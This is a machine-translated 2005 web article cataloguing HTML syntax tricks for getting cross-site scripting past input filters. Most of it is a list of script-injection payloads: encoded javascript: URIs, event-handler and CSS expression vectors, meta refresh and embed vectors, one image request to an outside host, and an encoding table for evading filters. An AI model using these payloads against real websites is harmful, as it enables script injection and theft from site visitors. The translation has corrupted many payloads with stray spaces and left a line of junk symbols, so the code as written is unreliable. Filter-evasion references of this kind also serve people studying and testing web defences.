This page has been robot translated, sorry for typos if any. Original content here.

Features of HTML Syntax

Creators: Algol , zFailure - last changes 13.06.2005

One of the main methods of protecting sites from XSS vulnerabilities is the use of different filters for user input characters. This article describes the features of HTML syntax, which allow you to bypass these filters.

It should be noted that XSS vulnerabilities are browser-dependent. All the examples below were tested in IE6. In other versions or in other browsers, the examples may also not work. For example, the character of the inverse apostrophe (`) is an attribute delimiter only in IE. Other browsers, such as Opera, for example, do not consider this symbol to be a deceptive.

  • Delimiters of tag attributes.
    In addition to the space, it is allowed to use the symbols: slash ( / ), tabulation, line feed. The delimiter is allowed to be omitted if the previous affiliation is enclosed in quotation marks.
     <image / src = "1.png" / alt = "Hint" / border = "0">
     <image src = "1.png" alt = "Tip" border = "0">
     <image
     src = "1.png"
     alt = "Hint"
     border = "0">
     <image src = "1.png" alt = "Tip" border = "0">
    
  • Tag Attribute Limiters
    Values ​​are allowed to be enclosed in quotes (double also single) also in apostrophes, only the general permission is not restricted.
     <image src = "" alt = "My tip" border = "0">
     <image src = "" alt = 'My tip' border = "0">
     <image src = "" alt = `My tip` border =" 0 ">
     <image src = "" alt = Tip border = "0">
    
  • Character encodings
    The decryption of symbols in the script occurs before it is executed:
      <img src = javascript: alert (& quot; ok & quot;)>
     <img src = javascript: alert (& # 039; ok & # 039;)>
     <img src = & #############################################################################★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
     <a href=javascript:alert(%22ok%22)> click me </a> (only in the href attribute)
    
    
  • Limiters of character literals in scripts
     <img src = javascript: alert ('ok')>
     <img src = javascript: alert ("ok")>
     <img src = javascript: a = / ok /; alert (a.source)>
     <img src = javascript: alert (String.fromCharCode (111,107))>
    
  • Bypass filtering some characters
      <img src = javascript: i = new / ** / Image (); i.src = 'http: //bla.bla'> (replacing the space with a / ** /)
    
    
  • Ways to run scripts
    Several ways to automatically run scripts:
      <script> alert ('ok') </ script>
     <script src = 1.js> </ script>
     <body onLoad = alert ('ok')>
     <meta http-equiv = Refresh content = 0; url = javascript: alert ('ok')>
     <image src = 1.png onload = alert ('ok')>
     <image src = javascript: alert ('ok')>
     <image src = "" onerror = alert ('ok')>
     <hr style = background: url (javascript: alert ('ok')))>
     <span style = top: expression (alert ('ok')))> </ span>
     <span sss = "alert (); this.sss = null" style = top: expression (eval (this.sss));> </ span> (only works once) <style type = "text / css"> @import url (javascript: alert ('ok')); </ style>
     <object classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url value = javascript: alert ('ok')> </ object>
     <embed src = javascript: alert ('ok'); this.avi>
     <embed src = javascript: alert ('ok'); this.wav>
     <iframe src = javascript: alert ('ok')> (only in IE) <a href=javascript:alert(%22ok%22)> click me </a> (launch only when clicking on the link) <a href = javascript: alert ('aaa' + eval ('alert (); i = 2 + 2') + 'bbb')> click me </a> (launch only when clicking on the link) <br SIZE = "& {alert ('XSS')} "> (only Netscape 4.x)
    
    
  • Various script protocols, ways of writing them
      <img src = javascript: alert ()>
     <img src = vbscript: AleRt ()>
     <img src = JaVasCriPt: alert ()>
     <img src = "javascript: alert ()"> (spaces up to javascript)
     
     <img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 112 & # 116: alert ()>
     <img src = javascript & # 9: alert ()>
     <img src = javascript & # 10: alert ()>
     <img src = javascript & # 13: alert ()>
     <img src = "javascript
     : alert () "> (before the colon - the tab character)
     
     <img src = "java
     scri
     pt: ale
     rt () "> (inside the word javascript - the tab character also returns the carriage)
     
    
  • Inserting scripts in style
    Script operators in the style attribute need to divide " \; ".
     <hr style = 'background: url (javascript: alert (' ok 1 ') \; alert (' ok 2 ')) `>
    
  • Special tags.
      <image src = "1.png" alt = "" border = "0"> (the img also works the same way) <plaintext> (anything that moves after this tag will be treated as plain text - not HTML) <textarea> (everything that will move later this tag will be perceived as plain text - not HTML in any way) <xml> (anything that will move later this tag will not be displayed in any way)
    
    
  • Table of frequently used codes:

    Symbol Decimal encoding 16th character encoding * Character encoding URL-encoding
    " & # 34 & # x22; & quot; % 22
    ' & # 39 & # x27; % 27
    " & # 96 & # x60; % 60
    <space> & # 32 & # x20; +
    <tab> &#9 & # x09; % 09
    <carriage return> &#13 & # x0D; % 0D
    = & # 61 & # x3D; % 3D
    < & # 60 & # x3C; & lt; lt % 3C
    > & # 62 & # x3E; & gt % 3E
    \ & # 92 & # x5C; % 5C
    % & # 37 & # x25; % 25
    + & # 43 & # x2B; % 2B
    <short hyphen> & # 173 & # xAD; & shy % AD
    & & # 38 & # x26; & amp % 26

    * -In some cases a semicolon can be omitted (if the character is at the end of the line, or in succession there are several characters in this encoding).

    See similar: http://ha.ckers.org/xss.html
  • It will not be superfluous for your friends to know this information, share their article with them!

    Expand / Collapse Expand / Collapse box with comments

    Comments

    Commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.
    Now everyone can publish articles
    Try it first!
    To write an article
    Liked? Subscribe to RSS news,
    to be the first to receive information
    about all important events of the country and the world.
    You can also support shram.kiev.ua, click: